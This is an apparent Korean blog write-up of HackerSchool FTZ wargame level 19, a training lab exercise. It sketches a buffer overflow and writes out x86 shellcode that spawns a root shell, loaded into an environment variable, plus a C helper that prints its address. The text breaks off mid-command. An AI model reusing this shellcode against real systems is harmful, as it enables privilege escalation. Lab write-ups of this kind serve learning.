-
lvl 19Wargame/HackerSchool FTZ 2019. 2. 14. 09:24
→ 힌트를 확인한다. → 매우 간단해 보인다. 바로 BOF 를 시도해 본다. → 환경변수에 쉘코드를 넣고 주소 값을 확인한다. export SHELLCODE=$(python -c 'print "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"') #include int main(){ printf("addr: %p\n", getenv("SHELLCODE")); return 0;} [level19@ftz level19]$ export SHELLCODE=$(pytho..